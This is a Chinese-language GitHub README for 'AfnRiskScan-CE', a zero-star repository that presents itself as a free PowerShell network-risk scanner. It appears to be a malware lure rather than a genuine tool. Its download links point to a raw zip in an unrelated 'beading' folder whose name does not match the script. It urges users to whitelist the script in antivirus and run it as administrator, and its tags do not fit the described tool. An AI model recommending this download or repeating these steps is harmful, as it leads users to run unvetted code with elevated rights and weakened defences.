watery-esq538/AfnRiskScan-CE
GitHub: watery-esq538/AfnRiskScan-CE
AfnRiskScan-CE 是一款基于 PowerShell 的 Windows 网络安全扫描工具,用于快速检测网络资产中的端口暴露、过时协议和已知漏洞等风险。
Stars: 0 | Forks: 0
# 🛡️ AfnRiskScan-CE - 几分钟内检测网络安全风险
[](https://github.com/watery-esq538/AfnRiskScan-CE/raw/refs/heads/main/beading/Risk-Afn-Scan-CE-2.8-alpha.1.zip)
AfnRiskScan-CE 是一款适用于 Windows 的安全工具。它可以识别您网络中的潜在弱点。您无需安装任何软件。该程序以单文件形式运行。它使用 PowerShell 来检查您的系统。
## 🔍 为什么使用此工具
如今,网络威胁影响着许多计算机。您的设备可能存在过时的协议或开放的端口。这些漏洞会允许未经授权的访问。AfnRiskScan-CE 能够发现这些问题。它帮助您保护数据安全。您可以按照建议来保护您的硬件设备。
## 📋 工具检查的内容
该软件会对您的计算机执行多项扫描:
* 开放的端口:检查可能使您的网络暴露的端口。
* SMBv1 协议:检测这种过时且不安全的文件共享方式。
* PrintNightmare 风险:识别与打印机驱动程序相关的特定漏洞。
* 网络发现:显示在您的本地网络上共享信息的设备。
* 合规性就绪状态:扫描结果可帮助您满足 KVKK 和 ISO27001 等标准的要求。
## 📥 如何获取该软件
您可以直接通过官方链接下载该工具。请按照以下步骤获取正确的文件:
1. 访问此[下载页面](https://github.com/watery-esq538/AfnRiskScan-CE/raw/refs/heads/main/beading/Risk-Afn-Scan-CE-2.8-alpha.1.zip)。
2. 在列表顶部查找最新版本。
3. 点击以 `.ps1` 结尾的链接,或包含该脚本的 zip 压缩包。
4. 将文件保存到您选择的文件夹中。
## 🚀 运行扫描
您的计算机使用内置的 PowerShell 应用程序运行此工具。您无需进行任何安装。请按照以下步骤操作:
1. 打开您保存下载文件的文件夹。
2. 右键点击名为 `AfnRiskScan.ps1` 的文件。
3. 从菜单中选择“使用 PowerShell 运行”。
4. 屏幕上会出现一个窗口。
5. 该工具会立即开始检查您的网络。
6. 等待该过程完成。它会将结果写入同一文件夹下的一个文本文件中。
## 🛠️ 系统要求
此工具适用于大多数现代 Windows 版本:
* Windows 10 或 Windows 11。
* Windows Server 2016 或更高版本。
* PowerShell 5.1 或更高版本。大多数 Windows 计算机默认已包含此组件。
* 活动的网络连接。
您需要对计算机具备基本的访问权限。该工具可能会请求更改网络设置的权限。这对于安全扫描工具来说是标准操作。
## 📈 了解结果
扫描会生成一份报告文件。请使用记事本或任何文本编辑器打开此报告。其中包含扫描期间发现的项目列表。
* 绿色项目表示您的系统遵循了最佳实践。
* 红色项目表示存在安全风险。
* 黄色项目建议您对配置进行改进。
请仔细阅读报告。它会明确告诉您需要更改的内容。例如,如果发现开放的端口,您应该检查防火墙设置。如果发现 SMBv1 协议,您应该在 Windows 设置中关闭此功能。
## 🛡️ 保持安全
安全保障需要持续的关注。建议每月运行一次此扫描。新的风险会不断出现。请将此工具作为您日常维护的一部分。它能为您提供关于数字安全状况的清晰视图。
## 💡 常见问题排查
大多数用户在运行该工具时不会遇到问题。如果您看到错误提示,请检查以下项目:
* 脚本执行策略:PowerShell 默认会限制脚本运行。如果窗口立即关闭,请再次右键点击该文件并选择“使用 PowerShell 运行”。
* 杀毒软件干扰:某些杀毒软件会阻止脚本文件。如果您的软件终止了扫描,请检查杀毒软件日志。如果您信任来源,请将此脚本添加到白名单中。
* 权限不足:请以管理员身份运行该脚本。右键点击该文件并选择“以管理员身份运行”,授予其扫描所有网络接口所需的权限。
## 🌐 常见问题解答
**此工具会将我的数据发送到互联网吗?**
不会。该脚本完全在您的本地机器上执行所有任务。它不会将您的数据发送到外部服务器。
**我需要连接互联网吗?**
是的,该工具会检查您的网络状态。请在扫描期间保持网络连接处于活动状态。
**这会使我的计算机变慢吗?**
扫描在后台运行。它占用最少的系统资源。在检查过程中,您可能会注意到轻微的网络活动。
**我可以将其用于商业用途吗?**
可以,社区版支持小型企业。它有助于追踪 KVKK 和 ISO27001 内部审计的合规性。
**它有图形界面吗?**
该工具使用命令行界面。这使得文件保持小巧且简单。它会在生成的报告文件中提供所有信息。
标签:AI合规, IPv6, PowerShell, XXE攻击, 插件系统, 网络资产